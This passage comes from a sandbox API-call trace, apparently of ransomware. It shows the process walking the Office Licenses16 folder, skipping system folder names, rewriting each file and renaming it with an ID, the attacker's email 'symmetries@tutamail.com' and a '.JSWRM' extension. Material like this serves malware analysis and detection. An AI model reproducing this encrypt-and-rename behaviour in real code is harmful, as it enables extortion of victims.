lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.888] CloseHandle (hObject=0x45c) returned 1 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0107.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0107.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.890] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe93e7dee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe93e7dee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe94ccc39, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="PR2939~1.XRM")) returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.890] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0107.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.891] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20918) returned 1 [0107.891] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0107.891] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0107.894] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.894] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0107.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.894] CloseHandle (hObject=0x45c) returned 1 [0107.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0107.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0107.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.896] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe93e7dee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe93e7dee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe95fdf4e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d72, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="PRAD69~1.XRM")) returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.896] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0107.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.897] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11634) returned 1 [0107.897] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.897] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.902] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.902] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.902] CloseHandle (hObject=0x45c) returned 1 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0107.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0107.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.902] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0107.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.903] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe934f47c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe934f47c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe94a6a18, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x516f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Grace-ppd.xrm-ms", cAlternateFileName="PR7F52~1.XRM")) returned 1 [0107.903] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0107.903] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0107.903] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0107.903] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0107.903] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.904] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.904] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.904] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.904] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.904] lstrcmpiW (lpString1="ProjectProR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0107.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0107.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0107.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 